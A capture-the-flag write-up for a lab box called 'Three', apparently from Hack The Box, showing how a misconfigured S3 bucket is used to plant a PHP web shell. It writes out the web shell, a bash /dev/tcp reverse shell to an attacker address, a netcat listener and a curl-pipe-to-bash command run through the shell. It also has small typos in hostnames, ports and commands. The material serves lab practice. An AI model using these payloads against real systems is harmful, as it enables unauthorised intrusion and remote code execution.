top of page

Three

As usual let's start with nmap

map -sV -sC targetIp

Let's add the target Ip in the /etc/hosts file

cd /etc
sudo nano hosts

We found port 80 is open. So let's check the website:


Now let's use gobuster to enumerate any subdomains

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://thetoppers.htb --append-domain

we found s3.thetoppers.htb



Let's add s3.thetoppers.htb in the /etc/hosts file too


We can interact with the S3 bucket using awscli


sudo apt install awscli
aws configure


just type "temp" for everything


We can list all of the S3 buckets hosted by the server using ls command

aws --endpoint=http://s3.thehoppers.htb s3 ls

we can use the ls command to list objects and common prefixes under the specified bucket

aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb


we can see files index.php and .htaccess and a directory called images in the S3 bucket

it looks like apache server is using this s3 bucket as storage


We can use awscli not only to read files using ls but we can also copy files to a remote bucket.


First let's create the shell.php that contains the code below:

<?php system($_GET["cmd"]); ?>

now let's copy shell.php onto the remote bucket using:

aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb

we have successfully uploaded shell.php onto the bucket


let's go back to our browser and type:

thetoppers.htb/shell.php?cmd=id

this confirms we got code execution on the box


Now, through a reverse shell we will now trigger the victim to connect back to our attacker's machine.


let's get a reverse shell by creating a new file shell.sh containing:

#!/bin/bash
bash -i >& /dev/tcp/<attackerIP>/1337 0>&1

now let's listen on port 1377 using

nc -lnvp 1337

now we need to host the shell.sh onto our web server


let's create a local web server using:

python3 -m http.server 8000

we can use curl to fetch the shell.sh file from our local host and then pipe it to bash in order to execute it

http://thetoppers.htb/shell.php?cmd=curl%20<attackerip>:8000/shell.sh|bash

let's go back to our netcat listener and we got the shell!


the flag is in the flag.txt file




175 views0 comments

Recent Posts

See All

Appointment

Sequel

Crocodile

Comments

Rated 0 out of 5 stars.
No ratings yet

Add a rating
bottom of page